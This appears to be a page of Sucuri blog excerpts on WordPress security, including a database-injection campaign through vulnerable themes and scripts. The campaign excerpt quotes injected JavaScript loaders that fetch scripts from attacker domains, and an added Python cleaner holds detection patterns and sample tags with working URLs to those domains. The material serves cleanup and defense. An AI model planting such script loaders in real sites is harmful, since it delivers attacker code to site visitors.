Categories
Security

Why You Should Care about Website Security on Your Small Site

Most people assume that if their website has been compromised, there must have been an attacker evaluating their site and looking for a specific vulnerability to hack. Under most circumstances, however, bad actors don't manually hand-pick websites to attack, since it's a tedious and time-consuming process. Instead, they rely on automation to identify vulnerable websites and execute their attacks.

The unfortunate reality is that websites big or small are targeted daily and the majority of these attacks are automated.

Continue reading Why You Should Care about Website Security on Your Small Site at Sucuri Blog.

New Guide on How to Clean a Hacked Website

Our mission at Sucuri is to make the internet a safer place and that entails cleaning up hacked websites. We have teams who actively research website vulnerabilities and who are eager to share with you some tips on how to clean your hacked website.

We are happy to help the community learn the steps they can follow to get rid of a website hack.

You can find all our guides to website security in a section of our website dedicated to providing concise and comprehensive tips on different areas of website security.

Continue reading New Guide on How to Clean a Hacked Website at Sucuri Blog.

Formidable Forms / Shortcodes Ultimate Exploits In The Wild

On Monday, November 20th, we were notified about a vulnerability that poses a serious security risk when the Shortcodes Ultimate and Formidable Forms plugins are used together on a single WordPress installation.

Over the past couple of weeks, we’ve noticed a large influx in the number of malicious requests testing for the presence of the two popular WordPress plugins. Both of these plugins contain separate medium-risk vulnerabilities that, when combined, allow an attacker to remotely execute rogue code on the underlying server.

Continue reading Formidable Forms / Shortcodes Ultimate Exploits In The Wild at Sucuri Blog.

Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data

Over the summer we've seen waves of WordPress database infections that use vulnerabilities in tagDiv's Newspaper/Newsmag themes or in the InterconnectIT Search and Replace script (searchreplacedb2.php).

The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks.

Typical injected scripts look like this:

<s cript type='text/javascript' src='hxxps://con1.sometimesfree[.]biz/c.js'>

Or:

var t = document.createElement("script");
t.type = "text/javascript"; t.src = "hxxps://src[.]dancewithme[.]biz/src.js";
document.head.appendChild(t);

Or:

The most noticeable malicious URLs that we’ve seen lately are:


They are all new domains registered specifically for this attack:

  • traffictrade[.]life – created on July 3rd, 2017
  • trysomethingnew[.]eu – created on August 11th, 2017
  • sometimesfree[.]biz – created on August 22nd, 2017
  • givemealetter[.]biz – created on August 27th, 2017
  • simplefunsite[.]info – created on September 2nd, 2017
  • dancewithme[.]biz – created on September 5th, 2017

Malware in WordPress Database

In most cases the scripts are injected right before <a href tags in the post content (wp_posts), meaning that webmasters may need to remove multiple injected scripts from hundreds of posts in the database – definitely not a task you want to do manually!
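As an added example (not code from the Sucuri post or from any Sucuri tool), here is a small Python cleaner for the two injection forms quoted above that also handles the serialized-data pitfall named in the title: the campaign domains are the ones listed on this page, and the sample post content and serialized theme option are constructed for the demonstration.

```python
import re
# Domains the post lists as newly registered for this campaign (from the page).
BAD_DOMAINS = ["sometimesfree.biz", "givemealetter.biz", "traffictrade.life",
               "trysomethingnew.eu", "simplefunsite.info", "dancewithme.biz"]
DOMAIN_RE = "|".join(re.escape(d) for d in BAD_DOMAINS)
# Form 1: <script src="https://<bad domain>/x.js"></script> dropped into the post HTML.
SRC_TAG_RE = re.compile(
    r"""<script[^>]*\ssrc=["']https?://[^"']*(?:%s)[^"']*["'][^>]*>(?:\s*</script>)?"""
    % DOMAIN_RE, re.IGNORECASE)
# Form 2: a loader that builds the tag with document.createElement() and sets .src.
LOADER_RE = re.compile(
    r"""<script[^>]*>\s*var\s+\w+\s*=\s*document\.createElement\(["']script["']\);.*?"""
    r"""\.src\s*=\s*["']https?://[^"']*(?:%s)[^"']*["'];.*?</script>""" % DOMAIN_RE,
    re.IGNORECASE | re.DOTALL)

def clean_html(content: str) -> str:
    """Strip both injection forms from plain HTML such as wp_posts.post_content."""
    return LOADER_RE.sub("", SRC_TAG_RE.sub("", content))

def clean_serialized(data: str) -> str:
    """Clean each string inside PHP serialize() output. The pitfall: strings are stored
    as s:<byte length>:"..."; so every length must be recomputed after editing."""
    raw = data.encode("utf-8")
    out, pos = bytearray(), 0
    for m in re.finditer(rb's:(\d+):"', raw):
        if m.start() < pos:            # token sits inside a string already consumed
            continue
        start, end = m.end(), m.end() + int(m.group(1))
        if raw[end:end + 2] != b'";':  # not a well-formed string token; leave as is
            continue
        cleaned = clean_html(raw[start:end].decode("utf-8")).encode("utf-8")
        out += raw[pos:m.start()] + b's:%d:"' % len(cleaned) + cleaned + b'";'
        pos = end + 2
    return (out + raw[pos:]).decode("utf-8")

def clean_value(value: str) -> str:
    """Entry point for one database cell: serialized values take the length-aware path."""
    return clean_serialized(value) if re.match(r"(?:a|O|s):\d+:", value) else clean_html(value)

def php_serialize_str(s: str) -> str:
    """Build a correct PHP serialized string (used to construct the sample below)."""
    return 's:%d:"%s";' % (len(s.encode("utf-8")), s)

# Constructed samples, not real site data: an injected post and a serialized theme option.
SAMPLE_POST = ('<p>Read more</p>'
               "<script type='text/javascript' src='https://con1.sometimesfree.biz/c.js'></script>"
               '<a href="https://example.com/">link</a>')
SAMPLE_OPTION = 'a:1:{s:6:"footer";%s}' % php_serialize_str(
    '<script>var t = document.createElement("script");t.type = "text/javascript"; '
    't.src = "https://src.dancewithme.biz/src.js";document.head.appendChild(t);</script>'
    '<a href="https://example.com/">home</a>')
```

Run `clean_value()` over each post_content, postmeta and option value instead of a blind search-and-replace; a value whose s:N lengths no longer match is silently treated as corrupt by PHP's unserialize(), which is exactly how careless cleanups break themes and plugins.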

Continue reading Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data at Sucuri Blog.